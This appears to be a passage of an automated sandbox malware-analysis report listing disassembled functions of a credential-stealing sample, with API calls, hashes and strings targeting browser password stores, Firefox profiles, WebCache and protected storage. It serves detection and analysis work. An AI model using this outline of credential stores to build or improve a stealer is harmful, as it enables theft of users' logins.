                                                                                                                                                                        • _wcslwr.MSVCRT ref: 0040AA14
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040AA29
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                                                                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                        • API String ID: 4091582287-4196376884
                                                                                                                                                                        • Opcode ID: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
                                                                                                                                                                        • Instruction ID: e8c4dab73010a582bcb55339b064a6b15101daee4fa053d2547f161988c3f8ed
                                                                                                                                                                        • Opcode Fuzzy Hash: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
                                                                                                                                                                        • Instruction Fuzzy Hash: C731D272700204AADB20BB6ACD41A9F7669EF80344F25087FB844FB1C6DB78DD91D699
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409FF2 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040A015
                                                                                                                                                                        • memset.MSVCRT ref: 0040A02D
                                                                                                                                                                          • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A049
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A058
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A09F
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A0AE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                        • API String ID: 2036768262-2114579845
                                                                                                                                                                        • Opcode ID: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
                                                                                                                                                                        • Instruction ID: e8ec88334da27b7df1bd19bf5f92620076e348809ddf91dc3f5a530f518c7d73
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
                                                                                                                                                                        • Instruction Fuzzy Hash: F121A9B254021C55DB20E691DC85EDB73BCAF54314F5104BFF615E2081EBB8DA84465D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0044376F Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                        • API String ID: 3510742995-2641926074
                                                                                                                                                                        • Opcode ID: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
                                                                                                                                                                        • Instruction ID: 2a909f6aa8b78d8aa74dd045bbec2887fe81728cdb5ed6237a850f532ee9234f
                                                                                                                                                                        • Opcode Fuzzy Hash: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A711CB1600201BFF310AF1ADC82B5AB798BB44719F15452FF45897782C7BDE9908B99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410A52 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CA3
                                                                                                                                                                          • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CB8
                                                                                                                                                                          • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410CE1
                                                                                                                                                                          • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410D0A
                                                                                                                                                                        • memset.MSVCRT ref: 00410A9A
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410AB1
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410AB9
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410B14
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410B22
                                                                                                                                                                          • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$memsetwcscat$wcscpy
                                                                                                                                                                        • String ID: history.dat$places.sqlite
                                                                                                                                                                        • API String ID: 2541527827-467022611
                                                                                                                                                                        • Opcode ID: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
                                                                                                                                                                        • Instruction ID: 16c00ee82f17989474e920b03892a6de4e18c3fe0141c7e4295d5dc86641310b
                                                                                                                                                                        • Opcode Fuzzy Hash: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
                                                                                                                                                                        • Instruction Fuzzy Hash: 17314571D041189ADF10EBA5DC89ACDB3B8AF50319F20457FE554F2182EB7C9A84CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411CDB Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$memsetwcscatwcscpy
                                                                                                                                                                        • String ID: Login Data$Web Data
                                                                                                                                                                        • API String ID: 3932597654-4228647177
                                                                                                                                                                        • Opcode ID: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
                                                                                                                                                                        • Instruction ID: 9a91d2e82c236d30763d7b9ebcc1a6cccb69c4478b10b945406aecd22e6d63c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
                                                                                                                                                                        • Instruction Fuzzy Hash: 46218B7250411C6ADB10EB55EC89FDA73ACAF50328F14487FF518E3191EBBCDAC44658
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417C9A Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,-7FBE8982,00000003,00000000,?,?,00000000), ref: 00417D72
                                                                                                                                                                        • CreateFileA.KERNEL32(?,-7FBE8982,00000003,00000000,004175FE,004175FE,00000000), ref: 00417D8A
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417D99
                                                                                                                                                                        • free.MSVCRT(?), ref: 00417DA6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 77810686-0
                                                                                                                                                                        • Opcode ID: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
                                                                                                                                                                        • Instruction ID: 35fec4397722218e6507e77f53b50855b574b2e4c8baf302a97b237cc2aa3bd3
                                                                                                                                                                        • Opcode Fuzzy Hash: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
                                                                                                                                                                        • Instruction Fuzzy Hash: D841F27150C3059FEB20CF25EC4179BBBF4EF84314F10892EF89592291D738DA848B96
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FC4E Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$DeleteHandleIconLoadModuleObjectmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3532479477-0
                                                                                                                                                                        • Opcode ID: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
                                                                                                                                                                        • Instruction ID: 6b7a5e441d588d9bc54ea64e01ff161f986e35cd5d296fb942180f783725d529
                                                                                                                                                                        • Opcode Fuzzy Hash: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
                                                                                                                                                                        • Instruction Fuzzy Hash: EA315EB19013888FDB30EF668C896CAB6E9BF45314F00863FE84DDB641DBB946448B59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410C87 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00410CA3
                                                                                                                                                                        • memset.MSVCRT ref: 00410CB8
                                                                                                                                                                          • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                          • Part of subcall function 00407DD1: wcslen.MSVCRT ref: 00407DD2
                                                                                                                                                                          • Part of subcall function 00407DD1: wcscat.MSVCRT ref: 00407DEA
                                                                                                                                                                        • wcscat.MSVCRT ref: 00410CE1
                                                                                                                                                                          • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                          • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                          • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                        • wcscat.MSVCRT ref: 00410D0A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                        • API String ID: 1534475566-1174173950
                                                                                                                                                                        • Opcode ID: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
                                                                                                                                                                        • Instruction ID: 1b820a25e8b0a88a2df896ef0368420f7b9c24777a221978b2b2a3cd549cec0e
                                                                                                                                                                        • Opcode Fuzzy Hash: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
                                                                                                                                                                        • Instruction Fuzzy Hash: 860152B294031C76EB20AB668C86EDB762C9F85358F0141AAB618B7142D97C9DC44AAD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004034E3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                          • Part of subcall function 00411E4C: memset.MSVCRT ref: 00411EC2
                                                                                                                                                                          • Part of subcall function 00411E4C: wcsrchr.MSVCRT ref: 00411EDB
                                                                                                                                                                          • Part of subcall function 00411BB2: SetCurrentDirectoryW.KERNEL32(?,?,?,00403557,?), ref: 00411BFF
                                                                                                                                                                        • memset.MSVCRT ref: 004035BC
                                                                                                                                                                        • memcpy.MSVCRT ref: 004035D0
                                                                                                                                                                        • wcscmp.MSVCRT ref: 004035F8
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040362F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1763786148-3916222277
                                                                                                                                                                        • Opcode ID: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
                                                                                                                                                                        • Instruction ID: bd143a35ad5b1b32f57d6bfe9876d60f7f1e4d0a05a181755c1d953110edcb1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
                                                                                                                                                                        • Instruction Fuzzy Hash: 24412A71D40229AADF20EFA5CC45ADEB7B8AF44318F1044ABE508B3241DB789B858F59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00414558 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004144AB: LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
                                                                                                                                                                          • Part of subcall function 004144AB: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                        • memset.MSVCRT ref: 004145B1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                          • Part of subcall function 004083A1: GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004145CC, 004145DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                        • API String ID: 2699640517-2036018995
                                                                                                                                                                        • Opcode ID: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
                                                                                                                                                                        • Instruction ID: e12ff53167afe07261100608862af2d586d512a8c684a17975878dc8bda8b34c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
                                                                                                                                                                        • Instruction Fuzzy Hash: 42112B71800214BBEF20A759CC4EAEFB3BDDB85754F6100A7F914A2151E62C5FC5869E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413CFB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcschr.MSVCRT ref: 00413D15
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 00413D3A
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,0044BCA0), ref: 00413D58
                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00413D70
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                        • String ID: "%s"
                                                                                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                                                                                        • Opcode ID: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
                                                                                                                                                                        • Instruction ID: 73e04fdb7293ad0563e201354ce1ff8293903967f03a71563bfd8de655adbfaf
                                                                                                                                                                        • Opcode Fuzzy Hash: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
                                                                                                                                                                        • Instruction Fuzzy Hash: 2401AD3240521EBBEF229F91EC45FDB3B6AFF04745F14806ABA1854062D779C660DB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041337C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 0041338D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 004133A7
                                                                                                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 004133CA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                                                                                        • Opcode ID: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
                                                                                                                                                                        • Instruction ID: da68f8d270a38a3c71bb0a1d73356e5427966c5ec0fa45e2ea30989c2ad8b33c
                                                                                                                                                                        • Opcode Fuzzy Hash: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
                                                                                                                                                                        • Instruction Fuzzy Hash: 41F01535140208AFEF108F91EC44B9A7BA9AB08B86F404026FE18C1162CB75DAA0DB5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041EAC1 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                        • String ID: @ $SQLite format 3
                                                                                                                                                                        • API String ID: 1475443563-3708268960
                                                                                                                                                                        • Opcode ID: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
                                                                                                                                                                        • Instruction ID: 378f5b88a64b421c164fea27eec5394a6c1f6cf5fd0cfe57e22cb817cc3972c5
                                                                                                                                                                        • Opcode Fuzzy Hash: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E51C1B59002059BDF14DF6AC8817DAB7F4AF54314F15019BEC04EB34AE778EA85CB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409EB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00409A23: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
                                                                                                                                                                          • Part of subcall function 00409A23: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
                                                                                                                                                                          • Part of subcall function 00409A23: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
                                                                                                                                                                          • Part of subcall function 00409A23: GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
                                                                                                                                                                          • Part of subcall function 00409A23: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
                                                                                                                                                                          • Part of subcall function 00409A23: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
                                                                                                                                                                          • Part of subcall function 00409A23: WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
                                                                                                                                                                          • Part of subcall function 00409A23: UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
                                                                                                                                                                          • Part of subcall function 00409A23: FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409F87
                                                                                                                                                                          • Part of subcall function 00409CB0: memset.MSVCRT ref: 00409D85
                                                                                                                                                                          • Part of subcall function 00409CB0: wcschr.MSVCRT ref: 00409DBD
                                                                                                                                                                          • Part of subcall function 00409CB0: memcpy.MSVCRT ref: 00409DF1
                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FA8
                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FCF
                                                                                                                                                                          • Part of subcall function 00409B7A: memset.MSVCRT ref: 00409BC2
                                                                                                                                                                          • Part of subcall function 00409B7A: _snwprintf.MSVCRT ref: 00409C5C
                                                                                                                                                                          • Part of subcall function 00409B7A: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,73BCF560), ref: 00409C90
                                                                                                                                                                        Strings
                                                                                                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409EC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                                                                                        • API String ID: 3931293568-1514811420
                                                                                                                                                                        • Opcode ID: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                        • Instruction ID: 3f51e9d3f4722dee63ca69fa5b044a2e48b650b6030bfe0f748ec1b1a5da80f7
                                                                                                                                                                        • Opcode Fuzzy Hash: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 65311CB1C006589BCF60DFA5CD855CDF7B8AF40314F1002AB9519F31A2DB755E858F58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E903 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpqsort
                                                                                                                                                                        • String ID: /nosort$/sort
                                                                                                                                                                        • API String ID: 1579243037-1578091866
                                                                                                                                                                        • Opcode ID: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                        • Instruction ID: da88191f08b8b868428b3ed71d9c82d207ce8b6ace4e6628c3e2187065429015
                                                                                                                                                                        • Opcode Fuzzy Hash: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7521F271700502AFD714FF36C981A5AB3A9FF95304B01097FE459A72D2CB7ABC218B99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040ADD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00413ACB: FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
